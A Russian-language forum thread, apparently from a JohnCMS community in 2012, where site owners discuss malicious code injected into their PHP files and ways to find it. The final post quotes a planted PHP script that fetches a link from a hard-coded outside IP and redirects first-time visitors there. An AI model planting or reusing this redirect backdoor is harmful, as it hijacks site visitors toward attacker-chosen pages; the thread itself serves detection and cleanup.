"левый" код в .php файлах
1.17K
Koenig
10 сен 2012 г., 19:56
(\/)____o_O____(\/)
не лезет в пост
Прикрепленные файлы:
389
(61.92 KB)
Koenig
10 сен 2012 г., 20:02
(\/)____o_O____(\/)
Blade, ужас какой то, что не разобрать так с первого раза, что за беда
Blade
10 сен 2012 г., 20:15
The Frontend-Warrior
Koenig, это шелл походу, там есть функция, внутри которой открывается листинг директории. глянь в моем файле на строке 494 функцию F7A0DC6FCF5A00BB584F0024BBAC75D65
Koenig
10 сен 2012 г., 20:19
(\/)____o_O____(\/)
Blade, интересно как такую бороду поймать, чистить думаюбудет долго и нудно, если в двиге около 1000 файлов
Blade
10 сен 2012 г., 20:22
The Frontend-Warrior
Koenig, как вариант написать скрипт рекурсивной функции вывода последнего изменения файла. а потом сверить с датой создания сайта (хотя бы по дате регистрации админа в базе) и вспомнить, какие модули ставил.
Libra
10 сен 2012 г., 23:17
Sensus veris
Blade (10.09.2012/17:23)Надеюсь, те снесла...
снесите эти два поста, файлы есть в теме
bleakas
10 сен 2012 г., 23:35
mi3ry (10.09.2012/17:49)Антивирь пхп
нарыл лекарство вроде помогает
mi3ry
11 сен 2012 г., 9:47
на сайте который на джоне 3.2.2 тоже заметил этот код 
Koenig
17 окт 2012 г., 8:37
(\/)____o_O____(\/)
сейчас на хосте нарыл файл
подозрительный скрипт
<?php
set_time_limit(30);
$cache = dirname(__FILE__) . '/link.cache';
$link = @file_get_contents($cache);
if (strlen($link) < 20 || (time()-@filemtime($cache)) > 60)
{
$link = @file_get_contents('http://78.46.14.162/api.php?action=link&aid=1345&fid=4780&hash=c1120ba44a14664ed80cfa5a18832c1b9b39dec0');
if (strlen($link) > 20)
{
$fp = @fopen ($cache, 'w');
@fputs($fp, $link);
@fclose($fp);
}
}
if (!isset($_COOKIE['traf']))
{
SetCookie("traf",'1',time()+86400);
header ('Location: ' . $link);
}
else
{
header ('Location: http://google.com');
}
?>подозрительный скрипт
Всего: 35
© 2024, JohnCMS